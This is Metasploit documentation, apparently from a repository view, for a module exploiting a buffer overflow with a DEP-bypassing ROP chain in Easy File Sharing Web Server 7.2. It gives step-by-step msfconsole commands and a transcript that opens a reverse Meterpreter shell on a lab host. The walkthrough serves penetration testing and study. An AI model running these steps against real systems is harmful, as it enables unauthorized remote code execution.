Brent Cook
7c55cdc1c8
3 modules got documentation landed in the wrong spot. This also fixes a few typos and improves formatting.
54 lines
1.7 KiB
Markdown
54 lines
1.7 KiB
Markdown
## Description
|
|
|
|
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
|
|
|
|
This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
|
|
|
|
## Vulnerable Application
|
|
|
|
[Easy File Sharing](http://www.sharing-file.com/) is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.).
|
|
|
|
This module has been tested successfully on
|
|
|
|
* Easy File Sharing 7.2 on Windows XP En Sp3
|
|
|
|
Installers:
|
|
|
|
[Easy File Sharing Installers](http://www.sharing-file.com/efssetup.exe)
|
|
|
|
## Verification Steps
|
|
|
|
1. Start `msfconsole`
|
|
2. Do: `use exploits/windows/http/easyfilesharing_post`
|
|
3. Do: `set rhosts [IP]`
|
|
4. Do: `exploit`
|
|
5. You should get your payload executed
|
|
|
|
## Scenarios
|
|
|
|
```
|
|
root@kali:~$ msfconsole -q
|
|
msf > use exploit/windows/http/easyfilesharing_post
|
|
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
|
|
RHOST => 192.168.56.101
|
|
msf exploit(easyfilesharing_post) > exploit
|
|
|
|
[*] Started reverse TCP handler on 192.168.56.1:4444
|
|
[*] Sending stage (957487 bytes) to 192.168.56.101
|
|
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
|
|
|
|
meterpreter > sysinfo
|
|
Computer : MM
|
|
OS : Windows XP (Build 2600, Service Pack 3).
|
|
Architecture : x86
|
|
System Language : en_US
|
|
Domain : WORKGROUP
|
|
Logged On Users : 2
|
|
Meterpreter : x86/windows
|
|
meterpreter > exit
|
|
[*] Shutting down Meterpreter...
|
|
|
|
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
|
|
msf exploit(easyfilesharing_post) >
|
|
```
|